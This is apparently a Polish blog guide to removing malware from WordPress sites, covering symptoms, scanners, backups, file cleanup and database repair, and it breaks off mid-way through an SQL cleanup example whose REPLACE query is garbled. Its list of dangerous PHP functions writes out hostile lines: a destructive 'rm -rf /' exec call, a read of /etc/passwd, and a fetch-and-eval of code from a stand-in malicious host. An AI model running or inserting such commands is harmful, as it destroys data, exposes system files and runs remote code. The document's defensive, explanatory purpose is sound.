1. Wprowadzenie

WordPress to jedna z najpopularniejszych platform do tworzenia stron internetowych. Dzięki prostocie obsługi, elastyczności oraz ogromnej ilości dostępnych motywów i wtyczek, jest wykorzystywany zarówno przez amatorów, jak i profesjonalistów. Niestety, jego popularność ma również ciemną stronę. WordPress, będąc tak powszechnie używanym systemem, stał się celem ataków cyberprzestępców. Jednym z najgroźniejszych zagrożeń, z jakimi możesz się spotkać, jest malware.

Czym jest malware i dlaczego jest groźny?

Malware (z angielskiego “malicious software” – złośliwe oprogramowanie) to szerokie określenie na wszelkiego rodzaju programy lub skrypty stworzone w celu wyrządzenia szkód. Może to być coś tak prostego jak reklamy wyświetlające się na stronie bez Twojej zgody, ale w najgorszych przypadkach może to być coś znacznie poważniejszego, jak kradzież danych, wstrzyknięcie złośliwego kodu, czy całkowite przejęcie kontroli nad stroną przez osoby trzecie.

W kontekście WordPressa, malware może przybierać różne formy:

• Backdoory – to specjalny rodzaj złośliwego kodu, który daje atakującym dostęp do Twojej strony, nawet po jej naprawieniu. Działa w ukryciu, co sprawia, że często nie jest łatwo go znaleźć.
• Phishing – atakujący mogą umieścić na Twojej stronie fałszywe formularze logowania lub strony płatności, próbując wyłudzić dane użytkowników.
• Przekierowania – malware może powodować, że użytkownicy Twojej strony zostaną automatycznie przekierowani na inne, złośliwe witryny, które mogą zawierać wirusy lub phishing.
• Spam SEO – hakerzy mogą wstrzykiwać na Twoją stronę ukryte linki, które prowadzą do zewnętrznych stron w celu manipulowania wynikami wyszukiwania. To nie tylko wpływa na reputację Twojej strony, ale także może prowadzić do zablokowania strony przez wyszukiwarki.
• Cryptojacking – atakujący mogą wstrzyknąć skrypt, który używa zasobów serwera do kopania kryptowalut. Tego rodzaju malware często powoduje spowolnienie działania strony i jej hostingu.

Jakie są objawy zainfekowanej strony?

Zauważenie, że Twoja strona została zainfekowana, nie zawsze jest łatwe. Często malware działa w tle, nie zdradzając od razu swojej obecności. Jednakże istnieją pewne objawy, które mogą świadczyć o infekcji:

1. Spowolnienie działania strony – nagłe, znaczące spowolnienie ładowania strony może być wynikiem działania złośliwego oprogramowania, które obciąża zasoby serwera.
2. Nieoczekiwane przekierowania – jeśli zauważysz, że Twoja strona przekierowuje odwiedzających na inne, podejrzane witryny, istnieje duże prawdopodobieństwo, że została zainfekowana.
3. Ostrzeżenia przeglądarek – przeglądarki takie jak Google Chrome mogą wyświetlać ostrzeżenie przed odwiedzeniem Twojej strony, informując użytkowników, że strona może zawierać złośliwe oprogramowanie.
4. Zniknięcie Twojej strony z wyników wyszukiwania – Google może usunąć zainfekowane strony z wyników wyszukiwania, aby chronić użytkowników przed zagrożeniami. Jeśli Twoja strona nagle przestaje być widoczna w wyszukiwarce, może to być sygnał, że jest zainfekowana.
5. Dziwne zmiany w plikach – pojawienie się nowych plików na serwerze lub zmiany w plikach, których sam nie dokonałeś, mogą świadczyć o obecności malware.
6. Dziwne zachowanie strony – wyświetlanie nieznanych reklam, komunikatów lub zmian wyglądu strony bez Twojej ingerencji, to także sygnał, że coś jest nie tak.

Dlaczego szybka reakcja jest ważna?

Gdy Twoja strona zostanie zainfekowana, czas gra na Twoją niekorzyść. Im dłużej złośliwe oprogramowanie działa na Twojej stronie, tym większe mogą być szkody:

• Strata reputacji: Użytkownicy, którzy trafią na Twoją zainfekowaną stronę, mogą stracić zaufanie i nie wrócić do Ciebie w przyszłości. Ostrzeżenia o zagrożeniu mogą również negatywnie wpłynąć na Twoją markę.
• Kary od Google: Jeśli Google wykryje, że Twoja strona jest zainfekowana, może nałożyć na nią sankcje, takie jak usunięcie jej z wyników wyszukiwania lub wyświetlanie ostrzeżeń przed wejściem na stronę.
• Kradzież danych: W przypadku niektórych rodzajów malware, atakujący mogą przechwycić poufne informacje, takie jak dane logowania użytkowników czy dane płatności.
• Strata zasobów: Malware, takie jak cryptojacking, może znacząco obciążyć Twój serwer, co w efekcie może prowadzić do zwiększonych kosztów lub nawet zawieszenia strony przez hostingodawcę.

Podsumowując, złośliwe oprogramowanie na WordPressie to poważne zagrożenie, które może negatywnie wpłynąć na działanie Twojej strony, jej pozycję w wyszukiwarkach oraz zaufanie użytkowników. Zrozumienie, czym jest malware, jakie są jego objawy oraz dlaczego szybka reakcja jest niezbędna, to pierwszy krok w skutecznej walce z tym problemem.

2. Krok 1: Diagnoza problemu

Kiedy podejrzewasz, że Twoja strona WordPress została zainfekowana, pierwszym krokiem jest diagnoza problemu. Bez dokładnej analizy trudno będzie ustalić, co dokładnie się stało i jakie działania są potrzebne, aby oczyścić stronę. Ważne jest, aby nie polegać jedynie na wtyczkach i narzędziach online, które mogą dawać fałszywe poczucie bezpieczeństwa, szczególnie gdy strona już została zainfekowana. Hakerzy często stosują zaawansowane techniki ukrywania złośliwego kodu, który może być niewidoczny dla standardowych narzędzi.

Jak rozpoznać infekcję?

Pierwszym krokiem jest zebranie jak największej ilości informacji o podejrzanej działalności na stronie. Zanim przejdziemy do użycia specjalistycznych narzędzi, warto zwrócić uwagę na kilka podstawowych objawów, które mogą świadczyć o infekcji:

1. Ostrzeżenia od Google lub innych przeglądarek: Google oraz inne przeglądarki (np. Chrome) mogą wyświetlać ostrzeżenie o tym, że Twoja strona została oznaczona jako niebezpieczna. Tego rodzaju ostrzeżenia są często związane z obecnością malware, które może powodować przekierowania lub instalować złośliwe oprogramowanie na komputerach odwiedzających.
2. Nieoczekiwane zmiany na stronie: Jeśli zauważysz dziwne treści, linki do nieznanych stron, dodatkowe skrypty, to bardzo możliwe, że Twoja strona została zainfekowana.
3. Nieautoryzowane zmiany plików: Infekcja może powodować zmiany w plikach Twojej strony, np. w pliku wp-config.php, functions.php lub nawet w głównych plikach WordPressa. Warto porównać te pliki z oryginalnymi, aby zidentyfikować nieznane zmiany.
4. Sygnały od użytkowników: Czasem to użytkownicy mogą informować Cię o problemach z Twoją stroną, np. o dziwnych przekierowaniach, wyświetlających się niechcianych reklamach lub o ostrzeżeniach przeglądarki.

Narzędzia do diagnozy problemu

Kiedy zauważysz podejrzane objawy wskazujące na infekcję, kluczowe jest przeprowadzenie dokładnej diagnozy problemu. Na rynku istnieje wiele wtyczek i narzędzi online, które obiecują skanowanie strony w poszukiwaniu malware. Jednak warto wiedzieć, że narzędzia te często okazują się nieskuteczne w przypadku już zainfekowanej strony. Dlaczego? Narzędzia online nie mają bezpośredniego dostępu do plików serwera – analizują jedynie to, co mogą zobaczyć z zewnątrz. W efekcie, wiele zagrożeń może pozostać niewykrytych, zwłaszcza jeśli złośliwy kod został ukryty głęboko w plikach PHP lub bazie danych.

Popularne wtyczki, takie jak Sucuri SiteCheck, Wordfence czy MalCare, choć mogą pomóc w monitorowaniu witryny, również nie zawsze radzą sobie z wykrywaniem zaawansowanego malware. Hakerzy często tworzą złośliwe oprogramowanie w taki sposób, aby unikało ono wykrycia przez te narzędzia. W rezultacie, korzystanie z nich może dać fałszywe poczucie bezpieczeństwa – strona wygląda na czystą, podczas gdy złośliwy kod nadal funkcjonuje w tle.

Tylko doświadczony programista, mający pełny dostęp do plików i logów serwera, jest w stanie skutecznie przeanalizować problem. Dzięki ręcznej analizie oraz użyciu bardziej zaawansowanych narzędzi, takich jak PHP Malware Scanner lub PHP-Antimalware-Scanner, możliwe jest dokładne zidentyfikowanie infekcji i usunięcie ukrytego malware, co nie jest możliwe przy użyciu standardowych wtyczek lub skanerów online.

1. PHP-Antimalware-Scanner
   PHP-Antimalware-Scanner to zaawansowane narzędzie do diagnozy malware, skoncentrowane na plikach PHP. Działa lokalnie i porównuje pliki na serwerze z bazą znanych wzorców złośliwego oprogramowania. Narzędzie to jest regularnie aktualizowane, co zwiększa jego skuteczność w wykrywaniu nowych zagrożeń.

Jak używać PHP-Antimalware-Scanner:

• Pobierz narzędzie z repozytorium GitHub i umieść je na serwerze.
• Uruchom skrypt poprzez konsolę lub z poziomu panelu zarządzania plikami.
• Po zakończeniu skanowania narzędzie generuje raport z wynikami, wskazując potencjalnie złośliwe pliki i fragmenty kodu.

Zalety:

• Regularnie aktualizowana baza zagrożeń, co pozwala na wykrywanie nowych typów malware.
• Działa lokalnie, co zapewnia pełny dostęp do wszystkich plików na serwerze.
• Tworzy szczegółowe raporty z wynikami, co ułatwia przeglądanie i usuwanie zainfekowanych plików.

Wady:

• Podobnie jak PHP Malware Scanner, wymaga dostępu do serwera i podstawowej wiedzy technicznej.
• Może wygenerować dużą liczbę wyników, co wymaga ręcznego przeglądania, a więc i większego nakładu pracy.

1. PHP Malware Scanner
   PHP Malware Scanner to kolejne narzędzie typu open-source, które zostało stworzone specjalnie do skanowania plików PHP w poszukiwaniu złośliwego oprogramowania. Działa lokalnie, bezpośrednio na Twoim serwerze, dzięki czemu ma dostęp do wszystkich plików i nie ogranicza się tylko do tego, co można zobaczyć z zewnątrz.

Jak używać PHP Malware Scanner:

• Pobierz skrypt z repozytorium GitHub i umieść go na swoim serwerze.
• Uruchom skanowanie poprzez wiersz poleceń lub panel zarządzania plikami w hostingu.
• Narzędzie przeskanuje pliki PHP na serwerze i wskaże potencjalnie niebezpieczne fragmenty kodu, które należy ręcznie przejrzeć i usunąć.

Zalety:

• Działa lokalnie na serwerze, co pozwala na głębszą analizę niż narzędzia online.
• Skutecznie wykrywa nietypowe fragmenty kodu, które mogą być przeoczone przez popularne wtyczki WordPressa.
• Prosta instalacja i użycie, bez potrzeby instalacji wtyczek w WordPressie.

Wady:

• Wymaga dostępu do serwera i podstawowej znajomości pracy z wierszem poleceń.
• Wyniki skanowania mogą generować fałszywe alarmy (false positives), co oznacza, że trzeba ręcznie przeanalizować wyniki.

Oba narzędzia są potężnymi rozwiązaniami dla programistów i administratorów, którzy mają dostęp do serwera. Umożliwiają one głębszą diagnozę zainfekowanej strony, której nie mogą przeprowadzić standardowe wtyczki czy skanery online. Niemniej jednak, korzystanie z tych narzędzi wymaga pewnej wiedzy technicznej, więc dla mniej doświadczonych użytkowników może być konieczna pomoc profesjonalisty.

Przykłady złośliwego kodu

Złośliwy kod na stronach WordPress może przyjmować różne formy, często wykorzystując funkcje PHP, które umożliwiają wykonywanie złośliwych działań. Hakerzy często ukrywają malware poprzez skomplikowane mechanizmy, aby unikać wykrycia. Poniżej przedstawiam kilka przykładów typowych funkcji, które mogą być wykorzystane do ukrycia i wykonania złośliwego kodu:

1. base64 – Funkcja służy do kodowania i dekodowania danych. Hakerzy często stosują ją do zamaskowania złośliwego kodu, który następnie jest dekodowany i wykonywany.
   
   Przykład:
   

   eval(base64_decode('ZWNobyAiSGVsbG8gd29ybGQiOw=='));

2. str_rot13 – Używana do zamiany liter w ciągu znaków. Złośliwy kod może być zamaskowany za pomocą tej funkcji i dopiero po rotacji liter odsłania swoją rzeczywistą funkcjonalność.
   
   Przykład:
   

   eval(str_rot13('riny("Uryyb Jbeyq!");'));

3. gzuncompress – Pozwala na dekompresję skompresowanego kodu, który następnie może być uruchomiony. Ta funkcja jest często stosowana w celu ukrycia złośliwego oprogramowania.
   
   Przykład:
   

   eval(gzuncompress(base64_decode('eJzLSM3JyVcozy/KSQEAGgsEXQ==')));

4. eval – Jedna z najbardziej niebezpiecznych funkcji, ponieważ wykonuje kod PHP przekazany jako ciąg znaków. To powszechna technika, wykorzystywana przez atakujących do uruchamiania złośliwego kodu na stronie.
   
   Przykład:
   

   eval($zlosliwyKod);

5. exec – Pozwala na wykonywanie poleceń systemowych na serwerze. Wykorzystywana do wykonywania złośliwych skryptów lub komend, które mogą modyfikować lub usuwać pliki.
   
   Przykład:
   

   exec('rm -rf /');

6. system – Podobnie jak exec, ta funkcja pozwala na wykonywanie poleceń systemowych i zwracanie wyników. Może być wykorzystana do uzyskania nieautoryzowanego dostępu do systemu plików.
   
   Przykład:
   

   system('cat /etc/passwd');

7. assert – Funkcja ta może być używana podobnie do eval, co sprawia, że jest równie niebezpieczna. Umożliwia wykonanie kodu PHP przekazanego jako argument.
   
   Przykład:
   

   assert('$a = 5; echo $a;');

8. preg_replace (z opcją /e) – Funkcja preg_replace z opcją e pozwala na wykonanie wyrażeń regularnych oraz uruchamianie kodu PHP, co może zostać wykorzystane do wstrzykiwania złośliwego oprogramowania.
   
   Przykład:
   

   preg_replace('/.*/e', 'malware_code()', $input);

9. move_uploaded_file – Ta funkcja pozwala na przenoszenie plików przesłanych przez użytkownika. Atakujący mogą używać tej funkcji, aby przesłać i uruchomić złośliwy plik PHP na Twoim serwerze.
   
   Przykład:
   

   move_uploaded_file($_FILES['file']['tmp_name'], '/path/to/destination.php');

10. stripslashes – Funkcja używana do usuwania znaków ukośnika z ciągu znaków. Choć sama w sobie nie jest złośliwa, może być częścią bardziej złożonych ataków, które manipulują danymi wejściowymi.
    
    Przykład:
    

    $clean_input = stripslashes($_POST['input']);

11. file_get_contents – Funkcja ta pobiera zawartość pliku lub strony internetowej i zwraca ją jako ciąg znaków. Może być wykorzystana do pobierania złośliwego kodu z zewnętrznych źródeł, które następnie są wykonywane na zainfekowanej stronie.
    
    Przykład:
    

    $malicious_code = file_get_contents('http://zlosliwa-strona.com/zlosliwy_kod.txt'); eval($malicious_code);

Na załączonych obrazach widoczne są przykłady kodu, który może być wynikiem infekcji malware. Fragmenty kodu są często zaciemnione, czyli zaszyfrowane lub zamaskowane, aby utrudnić ich wykrycie przez wtyczki zabezpieczające.

Ten fragment kodu PHP pokazuje typowy przykład użycia funkcji base64_decode oraz file_get_contents. Atakujący mogą używać tych funkcji do pobierania zewnętrznych zasobów (takich jak pliki ze złośliwym kodem) i ich dekodowania.


Wygląda na to, że plik jest przebrany za obraz GIF (GIF89a), ale w rzeczywistości zawiera binarne dane. Ta technika jest znana jako “malware disguise” – atakujący ukrywają złośliwy kod w plikach multimedialnych, aby zmylić administratorów oraz programy antywirusowe. Kod może być ukryty w nagłówku obrazu, a w momencie wywołania pliku przez serwer, może zostać wykonany. To typowy sposób na wstrzykiwanie kodu w plikach, które nie wzbudzają podejrzeń.

Ten obraz przedstawia złożony fragment złośliwego kodu, który używa base64_decode, by dekodować dane zakodowane wcześniej. Zmienna $vNB07PHP zawiera zakodowaną tablicę, która wygląda na zamaskowane znaki w celu utrudnienia analizy kodu. Dekodowany jest długi ciąg tekstu, co może sugerować, że jest to kod, który zostanie później wykonany. Widać również funkcję eval, która finalnie uruchomi ten zdekodowany kod, co może prowadzić do wykonania złośliwych instrukcji.

Kolejny przykład zakodowanego złośliwego kodu. W kodzie używane są tablice globalne $GLOBALS z losowymi kluczami, co dodatkowo utrudnia identyfikację intencji kodu. Każdy klucz i wartość są losowe i zakodowane, co sugeruje, że kod ten może dynamicznie generować lub pobierać złośliwe instrukcje. Skomplikowana struktura pliku wskazuje na próbę ukrycia złośliwego kodu w głębi plików PHP, co często stosują hakerzy, aby ich kod nie został wykryty przez prostsze skanery bezpieczeństwa.

Kod na tym obrazie pokazuje funkcję, która manipuluje danymi poprzez przekształcanie ich przy pomocy funkcji base64_decode oraz ukrytych ciągów znaków. Funkcja djshb wykonuje dekodowanie złośliwego kodu, który jest później przekazywany do zmiennej $lvkxb i prawdopodobnie wykonywany. Kod jest mocno zaciemniony, co oznacza, że jego głównym celem jest ukrycie przed administratorami i systemami bezpieczeństwa.

Na tym obrazie widoczny jest kod, który używa funkcji file_get_contents, aby pobrać dane z zewnętrznych źródeł. Są to zewnętrzne pliki tekstowe, które mogą zawierać złośliwy kod lub linki, które mogą przekierowywać odwiedzających na niebezpieczne strony.

3. Krok 2: Izolacja i kopia zapasowa strony

Gdy zidentyfikujesz, że Twoja strona WordPress została zainfekowana złośliwym oprogramowaniem, następnym kluczowym krokiem jest izolacja strony oraz wykonanie kopii zapasowej. Ten etap jest niezbędny, aby zminimalizować szkody oraz mieć możliwość przywrócenia czystej wersji strony w przypadku nieudanej próby usunięcia malware. Działanie bez wykonania kopii zapasowej może doprowadzić do utraty danych lub całkowitego uszkodzenia witryny.

Wyłączenie strony w trybie konserwacyjnym (maintenance)

Pierwszym krokiem po wykryciu złośliwego oprogramowania powinno być wyłączenie strony internetowej dla użytkowników zewnętrznych. Powstrzymasz w ten sposób odwiedzających przed narażeniem się na potencjalne zagrożenia, takie jak przekierowania na złośliwe witryny, kradzież danych czy infekcja ich urządzeń.

Jak wyłączyć stronę WordPress w trybie konserwacyjnym:

1. Zastosowanie wtyczki do trybu konserwacyjnego – Istnieje wiele wtyczek WordPress, które umożliwiają szybkie przełączenie strony w tryb konserwacyjny, np. Maintenance Mode lub WP Maintenance Mode. Tego typu wtyczki wyświetlają użytkownikom informację o pracach na stronie, jednocześnie pozwalając administratorowi na pełny dostęp.
2. Ręczna edycja plików – Możesz również ręcznie dodać stronę konserwacyjną poprzez edycję pliku .htaccess na serwerze, co zablokuje dostęp do strony z wyjątkiem administratora.
   
   Przykład kodu:
   

   RewriteEngine On RewriteCond %{REMOTE_ADDR} !^123\.456\.789\.000 RewriteRule .* /maintenance.html [R=503,L]

   
   
   W tym przykładzie użytkownicy będą widzieli stronę maintenance.html, a Ty, z podanego adresu IP (123.456.789.000), będziesz mieć dostęp do strony w celu jej naprawy.

3. Zamknięcie dostępu do panelu administracyjnego – W przypadkach krytycznych możesz również tymczasowo ograniczyć dostęp do panelu administracyjnego WordPressa, aby zminimalizować ryzyko dalszych ataków.

Wykonanie pełnej kopii zapasowej

Następnie, przed podjęciem jakichkolwiek działań naprawczych, wykonaj pełną kopię zapasową strony – zarówno plików, jak i bazy danych. Dzięki temu będziesz mieć pewność, że w razie niepowodzenia procesu naprawy lub przypadkowego usunięcia kluczowych plików, możesz przywrócić stronę do wcześniejszego stanu.

Jak wykonać kopię zapasową WordPress:

• Ręczna kopia zapasowa plików strony:

• Połącz się z serwerem za pomocą protokołu FTP lub SFTP za pomocą klienta FTP, np. FileZilla.
• Zlokalizuj katalog główny WordPressa (zazwyczaj jest to folder public_html lub www).
• Pobierz wszystkie pliki z katalogu na swój lokalny komputer, aby zabezpieczyć całą strukturę strony, w tym:
  • Motywy
  • Wtyczki
  • Media (obrazy, pliki PDF itp.)
  • Ważne pliki WordPressa (np. wp-config.php, .htaccess).

• Ręczna kopia zapasowa bazy danych:

• Zaloguj się do panelu zarządzania bazą danych, takiego jak phpMyAdmin.
• Wybierz bazę danych, która jest używana przez WordPressa (nazwa bazy danych znajduje się w pliku wp-config.php).
• Kliknij “Eksportuj”, a następnie wybierz metodę eksportu Szybki (Quick) i format SQL.
• Zapisz plik SQL lokalnie na swoim komputerze. Ten plik zawiera wszystkie posty, strony, komentarze, użytkowników i inne dane strony.

• Automatyczne tworzenie kopii zapasowych:

• Możesz również użyć wtyczek WordPress do tworzenia kopii zapasowych, np. UpdraftPlus, Duplicator lub BackupBuddy. Wtyczki te mogą automatycznie tworzyć kopie zapasowe plików i bazy danych i przechowywać je na chmurze (np. Dropbox, Google Drive) lub lokalnie.
• Warto upewnić się, że wtyczki te nie są zainfekowane, szczególnie jeśli strona już została zaatakowana, dlatego zawsze zaleca się ręczne wykonanie backupu.

Gdzie przechowywać kopię zapasową?

1. Zdalne lokalizacje – Zaleca się przechowywanie kopii zapasowej na zewnętrznym serwerze, chmurze (np. Google Drive, Dropbox) lub na dysku zewnętrznym. Dzięki temu będziesz mieć dostęp do plików, nawet jeśli serwer, na którym znajduje się strona, zostanie dodatkowo zainfekowany lub uszkodzony.
2. Lokalne kopie – Możesz również przechowywać kopię zapasową na swoim komputerze lub lokalnym serwerze. Upewnij się, że miejsce to jest dobrze zabezpieczone przed potencjalnymi atakami lub awariami.

Wskazówki dotyczące bezpiecznego przechowywania kopii zapasowych:

• Przechowuj kopie zapasowe w różnych miejscach – Aby zminimalizować ryzyko, przechowuj kopie zapasowe w co najmniej dwóch różnych lokalizacjach, np. na zewnętrznym serwerze oraz lokalnie na komputerze.
• Regularnie twórz kopie zapasowe – Tworzenie kopii zapasowych powinno być regularną czynnością, nie tylko w przypadku infekcji. Dzięki temu zawsze będziesz mieć aktualną wersję strony.
• Testuj przywracanie z kopii zapasowej – Regularne testowanie, czy kopie zapasowe można przywrócić, jest kluczowe, aby uniknąć niespodzianek w momencie awarii. Niektóre kopie mogą być uszkodzone lub niekompletne, co może prowadzić do dodatkowych problemów.

Izolacja strony i wykonanie kopii zapasowej to niezbędne kroki, które pozwalają zminimalizować szkody związane z atakiem malware. Dzięki tym działaniom możesz chronić swoich użytkowników przed zagrożeniami, a samemu zyskać pewność, że posiadasz zapasową wersję swojej strony w przypadku komplikacji podczas usuwania złośliwego oprogramowania. Dopiero po zabezpieczeniu kopii zapasowej możesz bezpiecznie przystąpić do usuwania złośliwego kodu i naprawy strony.

4. Krok 3: Usuwanie złośliwego oprogramowania

Po wykonaniu kopii zapasowej i izolacji strony kolejnym kluczowym krokiem jest ręczne usunięcie złośliwego oprogramowania. Automatyczne narzędzia, takie jak wtyczki, mogą nie być w pełni skuteczne, dlatego w przypadku zaawansowanych infekcji konieczne jest ręczne działanie, aby przywrócić stronę do pełnej funkcjonalności. W tym kroku skupimy się na usunięciu podejrzanych plików, folderów oraz analizie katalogu wp-content, gdzie zazwyczaj znajdują się zainfekowane pliki.

Usunięcie złośliwego oprogramowania – ręczna analiza

Jednym z najskuteczniejszych sposobów na oczyszczenie zainfekowanej strony WordPress jest usunięcie wszystkich plików i folderów, z wyjątkiem tych, które zawierają Twoje dane, czyli:

• Katalogu wp-content – Zawiera on wszystkie motywy, wtyczki oraz przesłane pliki multimedialne.
• Pliku wp-config.php – Zawiera on ustawienia bazy danych i konfigurację Twojej strony.

Resztę plików należy usunąć i zastąpić nowymi, pobranymi bezpośrednio z oficjalnej strony WordPressa. Pamiętaj, aby pobrana oryginalna wersja była zgodna z Twoją obecnie zainstalowaną! Temat aktualizacji poruszymy później.

Usunięcie i przywrócenie oryginalnych plików WordPressa

• Usuń zainfekowane pliki i foldery:

• • Połącz się z serwerem za pomocą klienta FTP (np. FileZilla) lub zaloguj się do panelu zarządzania plikami swojego hostingu.
  • Z katalogu głównego strony WordPress usuń wszystkie pliki i foldery, z wyjątkiem:
    • wp-content – Zawiera Twoje dane, wtyczki, motywy i przesłane media.
    • wp-config.php – Zawiera informacje konfiguracyjne, w tym dane dostępowe do bazy danych.
  • Pliki i foldery, które należy usunąć, obejmują m.in.:

• wp-admin/

• • wp-includes/
  • Wszystkie pliki PHP w katalogu głównym, z wyjątkiem wp-config.php.

• Pobierz oryginalne pliki WordPressa:

• • Wejdź na oficjalną stronę WordPressa (https://wordpress.org/download/) i pobierz najnowszą wersję WordPressa, która jest zgodna z Twoją aktualnie zainstalowaną wersją.
  • Wypakuj pobrane archiwum ZIP i prześlij na serwer czyste foldery i pliki:

• wp-admin

• wp-includes

• • Wszystkie pliki PHP w katalogu głównym.

W ten sposób zyskasz pewność, że pliki rdzeniowe Twojej strony są czyste i wolne od złośliwego oprogramowania.

Ręczna analiza katalogu wp-content

Katalog wp-content jest miejscem, w którym przechowywane są wszystkie pliki użytkownika, takie jak motywy, wtyczki i przesłane pliki (obrazy, dokumenty). Niestety, złośliwe oprogramowanie często ukrywa się w tym katalogu, ponieważ zawiera on niestandardowe pliki, które mogą zostać zainfekowane lub zastąpione przez hakerów.

• Analiza motywów i wtyczek:

• W katalogu wp-content/themes znajdują się motywy, które mogą być zainfekowane. Najlepszym rozwiązaniem jest usunięcie wszystkich motywów, z wyjątkiem motywu aktualnie używanego.
• Prześlij ponownie oryginalne pliki motywu z repozytorium WordPressa lub od dostawcy motywu.
• Dokładnie przejrzyj pliki functions.php, header.php, footer.php oraz inne pliki motywu, które mogą zawierać złośliwy kod (takie jak dodatkowe skrypty JavaScript, przekierowania, zakodowany tekst przy użyciu base64 itp.).

W przypadku katalogu wp-content/plugins:

• Usuń wszystkie podejrzane wtyczki oraz wtyczki, których nie rozpoznajesz lub które nie były ostatnio aktualizowane.
• Przeanalizuj pliki wtyczek, zwłaszcza te, które korzystają z funkcji takich jak eval(), base64_decode(), file_get_contents(), exec(), itp. Te funkcje mogą być używane do wstrzykiwania złośliwego oprogramowania.
• Prześlij ponownie czyste wersje wtyczek z repozytorium WordPressa lub strony dostawcy wtyczki.

• Przegląd uploadów i innych plików multimedialnych:

• W katalogu wp-content/uploads przechowywane są wszystkie przesłane pliki multimedialne (obrazy, PDF-y, itp.). Przejrzyj dokładnie ten folder, szukając nietypowych plików, takich jak pliki PHP (np. shell.php), które nie powinny znajdować się w tym katalogu bądź inne, których nazwa składa się z losowych ciągów znaków.
• Upewnij się, że w katalogach przeznaczonych na pliki multimedialne (np. /uploads/) znajdują się tylko pliki multimedialne (JPG, PNG, GIF, PDF). Usuń każdy znaleziony plik PHP lub pliki o podejrzanych nazwach, których nie powinno tam być.

• Analiza plików wskazanych przez narzędzia do skanowania malware:

• Użyj wcześniej wspomnianych narzędzi, takich jak PHP Malware Scanner i PHP-Antimalware-Scanner, które wskażą potencjalnie zainfekowane pliki. Te narzędzia mogą pomóc zidentyfikować pliki PHP, które zawierają nietypowe lub złośliwe funkcje.
• Na podstawie wyników skanowania ręcznie przejrzyj pliki wskazane jako podejrzane, zwracając uwagę na zakodowane fragmenty, takie jak base64_decode(), eval(), system(), itp.

Dodatkowe kroki po oczyszczeniu plików

Po zakończeniu ręcznej analizy i usunięciu złośliwego oprogramowania, wykonaj następujące kroki:

1. Zaktualizuj hasła:

• Zmień wszystkie hasła związane z Twoją stroną, w tym hasło do panelu administracyjnego WordPress, baz danych, FTP i kont hostingowych.
• Rozważ włączenie uwierzytelniania dwuskładnikowego (2FA) dla kont administratora WordPress.

• Sprawdź uprawnienia plików i folderów:

• Upewnij się, że katalogi mają odpowiednie uprawnienia (zazwyczaj 755 dla katalogów i 644 dla plików). Plik wp-config.php powinien mieć bardziej restrykcyjne uprawnienia, np. 600, aby chronić kluczowe dane konfiguracyjne.

Ręczne usunięcie złośliwego oprogramowania z plików WordPressa wymaga skrupulatności i precyzji. Usunięcie wszystkich plików poza katalogiem wp-content i plikiem wp-config.php oraz ponowne wgranie czystych plików WordPressa to skuteczna metoda pozbycia się infekcji z plików rdzeniowych. Z kolei ręczna analiza katalogu wp-content pozwoli na dokładne sprawdzenie niestandardowych plików, takich jak motywy, wtyczki i przesłane media, które mogą być zainfekowane.

Pamiętaj, że każda infekcja może różnić się w zależności od rodzaju ataku, dlatego dokładna analiza i usunięcie wszystkich podejrzanych plików są kluczowe w procesie oczyszczania strony WordPress.

5. Krok 4: Oczyszczenie i naprawa bazy danych

Po usunięciu złośliwego oprogramowania z plików WordPressa, kolejnym istotnym krokiem jest oczyszczenie i naprawa bazy danych. Złośliwy kod często nie ogranicza się tylko do plików, ale może również być wstrzyknięty do bazy danych. Hakerzy mogą wstrzykiwać złośliwe skrypty JavaScript, linki spamowe lub backdoory bezpośrednio do rekordów w bazie danych, szczególnie do tabel związanych z postami, komentarzami lub użytkownikami. Dlatego tak ważne jest, aby dokładnie sprawdzić i oczyścić bazę danych po infekcji.

Ręczna analiza bazy danych

Najlepszym sposobem na zidentyfikowanie złośliwego kodu w bazie danych jest ręczna analiza kluczowych tabel. Złośliwe oprogramowanie często celuje w pola związane z treścią (posty, strony, komentarze) lub ustawieniami strony.

Jak przeprowadzić ręczną analizę:

1. Dostęp do bazy danych:
   • Zaloguj się do panelu zarządzania bazą danych, takiego jak phpMyAdmin lub inny narzędzia do zarządzania bazami danych.
   • Znajdź bazę danych, której używa Twoja strona WordPress (jej nazwę znajdziesz w pliku wp-config.php, w polu DB_NAME).
2. Sprawdź kluczowe tabele: Skoncentruj się na tabelach, które najczęściej są celem ataków. W przypadku WordPressa będą to:
   • wp_posts – Tabela ta przechowuje treści postów i stron. Złośliwe skrypty mogą zostać wstrzyknięte do pól post_content, post_excerpt lub post_title. Sprawdź te pola pod kątem nietypowych fragmentów, takich jak zakodowany tekst (base64), skrypty JavaScript, podejrzane linki.
   • wp_comments – Tabela z komentarzami, gdzie hakerzy mogą wstrzykiwać linki spamowe lub kod.
   • wp_options – Tabela ta zawiera ustawienia strony. Złośliwe oprogramowanie może wstrzyknąć tu backdoory lub skrypty, które mogą być wykonane w panelu administracyjnym.

Przykład złośliwego kodu w bazie danych: W polach takich jak post_content możesz napotkać fragmenty złośliwego kodu, takie jak:

<script>alert(‘hacked’);</script>

lub

<iframe src=”http://malicious-site.com“></iframe>

• Filtrowanie wyników:

• W celu szybszego znalezienia podejrzanych danych, użyj funkcji wyszukiwania dostępnych w phpMyAdmin. Możesz przeszukiwać tabelę wp_posts, szukając podejrzanych fragmentów kodu:
  • script>
  • iframe>
  • base64 Te frazy mogą wskazywać na obecność złośliwego kodu w treści postów lub stron.

Naprawa i usuwanie podejrzanych rekordów

Po zidentyfikowaniu zainfekowanych rekordów w bazie danych należy je oczyścić.

Jak ręcznie naprawić zainfekowane rekordy:

• Edytuj rekordy – Jeśli zidentyfikujesz złośliwy kod w rekordach, np. w polu post_content, możesz ręcznie edytować dany wpis w phpMyAdmin. Wybierz opcję Edytuj (Edit) dla rekordu i usuń wszystkie podejrzane fragmenty kodu.
• Usuń rekordy – Jeśli znajdziesz podejrzane lub niepotrzebne rekordy, które wydają się być wynikiem ataku (np. komentarze spamowe lub nieautoryzowane posty), możesz je bezpiecznie usunąć. W phpMyAdmin zaznacz rekord i wybierz opcję Usuń (Delete).

Przykłady poleceń SQL do czyszczenia bazy danych

W niektórych przypadkach złośliwe skrypty mogą być rozmieszczone w wielu miejscach w bazie danych. Aby przyspieszyć proces ich usuwania, możesz skorzystać z zapytań SQL, które pozwolą na masowe oczyszczanie danych.

Przykładowe polecenia SQL:

1. Usunięcie złośliwego kodu z treści postów: Jeśli złośliwy kod (np. iframe) został wstrzyknięty do treści postów, możesz uruchomić następujące zapytanie SQL, aby go usunąć:
   UPDATE wp_posts SET post_content = REPLACE(post_content, ““, ”);

